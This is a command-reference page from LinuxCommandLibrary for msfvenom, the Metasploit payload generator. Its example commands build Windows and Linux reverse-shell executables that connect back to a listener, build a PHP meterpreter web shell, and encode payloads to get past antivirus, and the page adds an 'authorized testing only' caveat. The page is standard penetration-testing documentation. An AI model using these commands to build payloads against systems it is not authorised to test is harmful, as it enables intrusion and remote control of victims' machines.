LinuxCommandLibrary

msfvenom

generates payloads for Metasploit

TLDR

List payloads

$ msfvenom -l payloads
copy
List encoders
$ msfvenom -l encoders
copy
Generate Windows reverse shell
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=[192.168.1.10] LPORT=[4444] -f exe > [shell.exe]
copy
Generate Linux payload
$ msfvenom -p linux/x86/shell_reverse_tcp LHOST=[192.168.1.10] LPORT=[4444] -f elf > [shell.elf]
copy
Encode payload
$ msfvenom -p [payload] -e x86/shikata_ga_nai -i [5] -f exe > [encoded.exe]
copy
Generate shellcode
$ msfvenom -p [payload] -f c
copy
Generate web payload
$ msfvenom -p php/meterpreter/reverse_tcp LHOST=[ip] LPORT=[port] -f raw > [shell.php]
copy

SYNOPSIS

msfvenom [options]

DESCRIPTION

msfvenom generates payloads for Metasploit. It combines msfpayload and msfencode functionality.
The tool creates shellcode and executables. Supports encoding and format conversion.

PARAMETERS

-p PAYLOAD

Payload to use.
-f FORMAT
Output format.
-e ENCODER
Encoder to use.
-i COUNT
Encoding iterations.
-l TYPE
List available items.
LHOST
Local host address.
LPORT
Local port number.
--help
Display help information.

CAVEATS

Authorized testing only. AV may detect payloads. Part of Metasploit Framework.

HISTORY

msfvenom replaced msfpayload and msfencode in Metasploit Framework, unifying payload generation.

SEE ALSO

msfconsole(1), msfpc(1), nmap(1)

> TERMINAL_GEAR

Curated for the Linux community

Copied to clipboard

> TERMINAL_GEAR

Curated for the Linux community